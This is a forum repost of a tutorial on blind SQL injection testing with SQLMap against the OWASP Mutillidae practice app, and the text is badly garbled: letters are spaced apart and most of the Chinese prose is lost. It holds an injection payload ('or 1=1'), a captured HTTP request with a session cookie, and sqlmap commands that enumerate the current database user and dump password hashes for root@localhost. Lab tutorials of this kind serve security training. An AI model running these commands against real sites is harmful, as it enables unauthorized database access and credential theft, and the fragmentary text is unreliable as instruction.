[7944] 2014-04-10_Web应用手工渗透测试——用SQLMap进行SQL盲注测试

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-17
2014-04-10_Web应用手工渗透测试——用SQLMap进行SQL盲注测试 W e b S Q L M a p S Q L F r e e B u f   2 0 1 4 - 0 4 - 1 0   T a s k i l l e r S Q L S Q L s u f f i x   a n d   p r e f i x   S Q L w i k i p e d i a N O W A S P   M u t i l l i d a e N O W A S P   M u t i l l i d a e S Q L w e b S Q L 使 S Q L S h o w   T i m e j o n n y b r a v o m o m m a O W A S P   2 0 1 3   >   A 1   S Q L   I n j e c t i o n   >   E x t r a c t d a t a   >   U s e r   I n f o I D S Q L 使 s u f f i x p r e f i x 使 U s e r n a m e :   j o n n y b r a v o   o r   1 = 1 ;   j o n n y b r a v o O R i f   o r   1 1 1 = 1 ; 1   p a y l o a d 2
2   p a y l o a d S Q L B a c k T r a c k S a m u r a i   S Q L m a p 使 S Q L m a p S Q L m a p 使 S Q L m a p 使 使 p u r g e - o u t p u t 3   S Q L m a p   o u t p u t 使 S Q L m a p U R L B u r p S Q L m a p G E T   / c h i n t a n / i n d e x . p h p ? p a g e = u s e r - i n f o . p h p & u s e r n a m e = j o n n y b r a v o & p a s s w o r d = m o m m a & u s e r - i n f o - p h p - s u b m i t - b u t t o n = V i e w + A c c o u n t + D e t a i l s   H T T P / 1 . 1 H o s t :   l o c a l h o s t U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   5 . 1 ;   r v : 2 7 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 2 7 . 0
A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e R e f e r e r :   h t t p : / / l o c a l h o s t / c h i n t a n / i n d e x . p h p ? p a g e = u s e r - i n f o . p h p C o o k i e :   s h o w h i n t s = 0 ;   u s e r n a m e = j o n n y b r a v o ;   u i d = 1 9 ;   P H P S E S S I D = f 0 1 s o n m u b 2 j 9 a u s h u l l 1 b v h 8 b 5 C o n n e c t i o n :   k e e p - a l i v e K A L I   l i n u x S Q L m a p S Q L m a p   r   ~ / r o o t / D e s k t o p / h e a d e r . t x t S e l f - C r i t i c a l   E v a l u a t i o n - r ~ / r o o t / D e s k t o p / h e a d e r . t x t V M w a r e W i n d o w s K A L I I P 使 K A L I   l i n u x X P
S Q L m a p G E T   / c h i n t a n / i n d e x . p h p ? p a g e = u s e r - i n f o . p h p & u s e r n a m e = j o n n y b r a v o & p a s s w o r d = m o m m a & u s e r - i n f o - p h p - s u b m i t - b u t t o n = V i e w + A c c o u n t + D e t a i l s   H T T P / 1 . 1 S Q L m a p M y S Q L O r a c l e   S Q L P o s t g r e S Q L M i c r o s o f t   S Q L   S e r v e r S Q L m a p O W A S P   m u t i l l i d a e 0 S Q L m a p D B M S M Y S Q L M Y S Q L M Y S Q L i n c l u d e M Y S Q L p a y l o a d y e s p a y l o a d s G E T B o o l e a n
p a y l o a d s G E T B o o l e a n u s e r n a m e S Q L m a p p a y l o a d s u s e r n a m e 使 B o o l e a n S Q L S Q L m a p t e c h n i q u e B   :   B o o l e a n B o o l e a n   b a s e d   b l i n d Q   :   I n l i n e   q u e r i e s T   :   t i m e   b a s e d   b l i n d U   :   U n i o n   q u e r y   b a s e d E   :   e r r o r   b a s e d S   :   s t a c k   q u e r i e s u s e r n a m e S Q L m a p   r   ~ r o o t / D e s k t o p / h e a d e r . t x t     - t e c h n i q u e   B     - p   u s e r n a m e     - c u r r e n t - u s e r - p c u r r e n t - u s e r S Q L m a p M Y S Q L
D B M S 使 D B M S S Q L m a p S Q L S Q L 使 使 i f i f u s e r n a m e j o n n y b r a v o 7 3 3 3 7 3 3 3 S Q L m a p 7 3 3 3 p a g e = u s e r - i n f o . p h p ? u s e r n a m e = j o n n y b r a v o   A N D   a = ' a   e t c . . F A L S E p a g e = u s e r - i n f o . p h p ? u s e r n a m e = j o n n y b r a v o   A N D   l = ' l   e t c . . T R U E p a g e = u s e r - i n f o . p h p ? u s e r n a m e = j o n n y b r a v o   A N D   s = ' s   e t c . . T R U E p a g e = u s e r - i n f o . p h p ? u s e r n a m e = j o n n y b r a v o   A N D   b = ' b   e t c . . F A L S E u s e r n a m e r o o t @ l o c a l h o s t l s w e b S Q L   s e r v e r c u r r e n t - u s e r 使 - U p a s s w o r d - U p a s s w o r d S Q L m a p S Q L m a p   - r   ~ r o o t / D e s k t o p / h e a d e r . t x t   - - t e c h n i q u e   B   - p   u s e r n a m e   - U   r o o t @ l o c a l h o s t   - - p a s s w o r d s
S e l f - C r i t i c a l   E v a l u a t i o n N U L L r o o t @ l o c a l h o s t 使 M y S Q L u s e r p a s s w o r d s y s a d m i n S Q L m a p N U L L S Q L S Q L S Q L S Q L R e f e r e n c e s 1 .   h t t p : / / e n . w i k i p e d i a . o r g / w i k i / S Q L _ i n j e c t i o n 2 .   h t t p : / / w w w . S Q L m a p . o r g / 3 .   h t t p s : / / g i t h u b . c o m / S Q L m a p p r o j e c t / S Q L m a p / w i k i / u s a g e 4 .   h t t p : / / d e v . m y s q l . c o m / d o c / r e f m a n / 5 . 6 / e n / e x a m p l e s . h t m l [ v i a   i n f o s e c i n s t i t u t e ]

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则